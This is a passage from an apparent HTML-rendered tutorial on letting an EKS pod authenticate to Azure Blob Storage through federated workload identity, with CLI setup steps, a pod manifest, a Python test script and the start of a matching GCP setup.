az ad app create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt; eks-to-azure-app

&lt;span class="nv"&gt;APP_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az ad app list &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt; eks-to-azure-app &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"[0].appId"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create service principal&lt;/span&gt;
az ad sp create &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt;

&lt;span class="nv"&gt;OBJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az ad sp show &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 4. Create federated credential&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; federated-credential.json &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;
{
  "name": "eks-federated-identity",
  "issuer": "&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;",
  "subject": "system:serviceaccount:default:eks-cross-cloud-sa",
  "audiences": [
    "api://AzureADTokenExchange"
  ]
}
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;az ad app federated-credential create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--parameters&lt;/span&gt; federated-credential.json

&lt;span class="c"&gt;# 5. Assign Azure role (using resource-specific scope for security)&lt;/span&gt;
&lt;span class="nv"&gt;SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az account show &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# First create the storage account, then get its resource ID&lt;/span&gt;
az group create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; eks-cross-cloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt; eastus &lt;span class="nt"&gt;--subscription&lt;/span&gt; &lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;

az storage account create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; ekscrosscloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; eks-cross-cloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt; eastus &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--sku&lt;/span&gt; Standard_LRS &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--kind&lt;/span&gt; StorageV2 &lt;span class="nt"&gt;--subscription&lt;/span&gt; &lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;

&lt;span class="c"&gt;# Get storage account resource ID for proper scoping&lt;/span&gt;
&lt;span class="nv"&gt;STORAGE_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az storage account show &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; ekscrosscloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; eks-cross-cloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

az role assignment create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assignee&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt; &lt;span class="s2"&gt;"Storage Blob Data Reader"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--scope&lt;/span&gt; &lt;span class="nv"&gt;$STORAGE_ID&lt;/span&gt;

&lt;span class="c"&gt;# 6. Create test container&lt;/span&gt;
az storage container create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; test-container &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--account-name&lt;/span&gt; ekscrosscloud &lt;span class="nt"&gt;--subscription&lt;/span&gt; &lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--auth-mode&lt;/span&gt; login

&lt;span class="c"&gt;# find the tenant ID, you will need for yaml manifests below&lt;/span&gt;
&lt;span class="nv"&gt;TENANT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az account show &lt;span class="nt"&gt;--query&lt;/span&gt; tenantId &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
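&lt;p&gt;A common failure mode at this step is a subject mismatch: Azure AD compares the federated credential's &lt;code&gt;subject&lt;/code&gt; byte-for-byte against the &lt;code&gt;sub&lt;/code&gt; claim of the incoming token, and for Kubernetes service-account tokens that claim is always &lt;code&gt;system:serviceaccount:&amp;lt;namespace&amp;gt;:&amp;lt;name&amp;gt;&lt;/code&gt;. A small sketch (&lt;code&gt;k8s_subject&lt;/code&gt; is a hypothetical helper) that constructs and checks the string:&lt;/p&gt;

```python
# Build the Kubernetes service-account subject that Azure AD compares
# byte-for-byte against the federated credential's "subject" field.
# k8s_subject() is a hypothetical helper for illustration.

def k8s_subject(namespace, service_account):
    return f"system:serviceaccount:{namespace}:{service_account}"

# Matches the "subject" written into federated-credential.json above.
expected = "system:serviceaccount:default:eks-cross-cloud-sa"
assert k8s_subject("default", "eks-cross-cloud-sa") == expected

# A different namespace silently breaks the trust, so catch it early.
assert k8s_subject("prod", "eks-cross-cloud-sa") != expected
print("subject check passed")
```

&lt;p&gt;If you later move the pod to another namespace or rename the service account, the federated credential must be updated to the new subject string.&lt;/p&gt;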



&lt;p&gt;&lt;strong&gt;Kubernetes Manifest:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Submit the manifest below to validate Scenario 1.2. If authentication is working, you will see success logs like those shown further down.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# scenario1-2-eks-to-azure.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-azure-test&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="c1"&gt;# eks-cross-cloud-sa SA is created in Scenario 1.1 above&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-test&lt;/span&gt;
      &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;
      &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;sh&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;-c&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;pip install --no-cache-dir azure-identity azure-storage-blob &amp;amp;&amp;amp; \&lt;/span&gt;
          &lt;span class="s"&gt;python /app/test_azure_from_eks.py&lt;/span&gt;
      &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AZURE_CLIENT_ID&lt;/span&gt;
          &lt;span class="c1"&gt;# replace YOUR_APP_ID with actual value for the app you created above&lt;/span&gt;
          &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_APP_ID"&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AZURE_TENANT_ID&lt;/span&gt;
          &lt;span class="c1"&gt;# replace YOUR_TENANT_ID with actual value, you can find using `az account show --query tenantId --output tsv`&lt;/span&gt;
          &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_TENANT_ID"&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AZURE_FEDERATED_TOKEN_FILE&lt;/span&gt;
          &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/azure/tokens/azure-identity-token&lt;/span&gt;
      &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
          &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/app&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-token&lt;/span&gt;
          &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/azure/tokens&lt;/span&gt;
          &lt;span class="na"&gt;readOnly&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
      &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-test-code&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-token&lt;/span&gt;
      &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
              &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-identity-token&lt;/span&gt;
              &lt;span class="na"&gt;expirationSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3600&lt;/span&gt;
              &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api://AzureADTokenExchange&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-test-code&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;test_azure_from_eks.py&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;# Code will be provided below&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Test Code (Python):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# test_azure_from_eks.py
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;azure.identity&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;WorkloadIdentityCredential&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;azure.storage.blob&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;BlobServiceClient&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_azure_access&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;client_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;AZURE_CLIENT_ID&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;tenant_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;AZURE_TENANT_ID&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;token_file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;AZURE_FEDERATED_TOKEN_FILE&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="nf"&gt;all&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="n"&gt;client_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tenant_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;token_file&lt;/span&gt;&lt;span class="p"&gt;]):&lt;/span&gt;
            &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;ValueError&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Missing required environment variables&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="n"&gt;credential&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;WorkloadIdentityCredential&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;tenant_id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;tenant_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;client_id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;client_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;token_file_path&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;token_file&lt;/span&gt;
        &lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# if you created your storage account with different name replace ekscrosscloud with your name
&lt;/span&gt;        &lt;span class="n"&gt;storage_account_url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://ekscrosscloud.blob.core.windows.net&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

        &lt;span class="n"&gt;blob_service_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;BlobServiceClient&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;account_url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;storage_account_url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;credential&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;credential&lt;/span&gt;
        &lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="n"&gt;containers&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;blob_service_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_containers&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;results_per_page&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;✅ Azure Authentication successful!&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;containers&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; containers:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;container&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;containers&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  - &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;container&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;

    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;❌ Azure Authentication failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;traceback&lt;/span&gt;
        &lt;span class="n"&gt;traceback&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print_exc&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;test_azure_access&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Success logs:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If &lt;code&gt;kubectl logs -f -n default eks-azure-test&lt;/code&gt; shows output like the following, the EKS-to-Azure authentication worked.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;✅ Azure Authentication successful!
Found 1 containers:
  - test-container
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  1.3 Authenticating to GCP from EKS
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Setup Steps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Get EKS OIDC issuer&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;aws eks describe-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-eks-cluster &lt;span class="nt"&gt;--region&lt;/span&gt; us-east-1 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"cluster.identity.oidc.issuer"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; text&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 2. Create Workload Identity Pool&lt;/span&gt;
gcloud auth login
gcloud config &lt;span class="nb"&gt;set &lt;/span&gt;project YOUR_PROJECT_ID
gcloud iam workload-identity-pools create eks-pool &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;global &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"EKS Pool"&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create Workload Identity Provider&lt;/span&gt;
&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud config get-value project&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud projects describe &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--format&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"value(projectNumber)"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
